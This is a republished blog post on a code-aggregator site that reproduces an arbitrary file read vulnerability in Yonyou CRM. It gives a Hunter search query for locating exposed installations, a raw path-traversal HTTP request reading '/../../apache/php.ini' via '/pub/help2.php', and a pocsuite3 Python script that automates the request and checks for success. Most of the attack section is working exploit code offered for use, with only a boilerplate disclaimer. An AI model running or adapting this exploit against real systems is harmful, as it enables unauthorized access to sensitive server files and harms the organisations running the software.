Vulnerability recurrence - arbitrary file reading exists in a certain interface of a friend's CRM system (with vulnerability detection script attached)

Internet 2023-12-27 21:34:54 views: null

Disclaimer

The vulnerabilities involved in the article have been fixed, and sensitive information has been coded. The article is only for experience sharing . Do not take it seriously. Unauthorized attacks are illegal! Sensitive information in the article has been processed at multiple levels. The user shall be responsible for any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article. The author does not bear any responsibility for this. Please be responsible for any consequences.

Vulnerability description

Mouyou CRM system is a comprehensive customer relationship management software designed to help companies establish and maintain good relationships with customers. It offers comprehensive functionality including sales management, marketing, customer service, analytical reporting, and more. The system supports a variety of industries and enterprise sizes, and is flexible and customizable, and can be personalized according to the needs of the enterprise. The CRM system software has an arbitrary file reading vulnerability, through which an attacker can obtain sensitive files in the server.

hunter syntax

app.name="用友 CRM"

POC plus detection

GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=kq0qq7g3pfmkbou067ksc6uf85
Upgrade-Insecure-Requests: 1

poc script

pocsuite framework for scripts

# _*_ coding:utf-8 _*_
# @Time : 2023/12/18
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class yongyouu8_CRM_fileread(POCBase):
    pocDesc = '''用友CRM系统某接口存在任意文件读取'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-18'
    name = '用友CRM系统某接口存在任意文件读取'



    def _verify(self):

        result = {}
        url = self.url+ '/pub/help2.php?key=/../../apache/php.ini'

        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
        }

        try:


            response = requests.get(url, headers=headers)
            if response.status_code == 200 and 'About php.ini' in response.text:
                result['VerifyInfo'] = {}


            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(yongyouu8_CRM_fileread)

Script exploit

Guess you like

Origin blog.csdn.net/jjjj1029056414/article/details/135064678
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com